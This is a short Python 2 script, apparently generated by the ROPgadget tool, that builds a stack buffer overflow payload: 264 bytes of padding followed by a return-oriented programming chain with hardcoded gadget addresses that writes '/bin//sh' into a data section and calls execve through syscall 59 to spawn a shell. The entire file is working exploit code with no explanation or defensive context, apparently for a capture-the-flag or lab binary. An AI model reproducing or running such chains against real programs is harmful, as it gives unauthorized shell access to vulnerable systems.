#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = 'A'*264

p += pack('<Q', 0x00000000004016a7) # pop rsi ; ret
p += pack('<Q', 0x00000000006b41c0) # @ .data
p += pack('<Q', 0x000000000043167d) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000045f661) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004016a7) # pop rsi ; ret
p += pack('<Q', 0x00000000006b41c8) # @ .data + 8
p += pack('<Q', 0x000000000041918f) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045f661) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040158b) # pop rdi ; ret
p += pack('<Q', 0x00000000006b41c0) # @ .data
p += pack('<Q', 0x00000000004016a7) # pop rsi ; ret
p += pack('<Q', 0x00000000006b41c8) # @ .data + 8
p += pack('<Q', 0x0000000000432ef5) # pop rdx ; ret
p += pack('<Q', 0x0000000000000000) #  NULL
p += pack('<Q', 0x000000000043167d) # pop rax ; ret
p += pack('<Q', 59) # 59
p += pack('<Q', 0x00000000004003e7) # syscall

print p
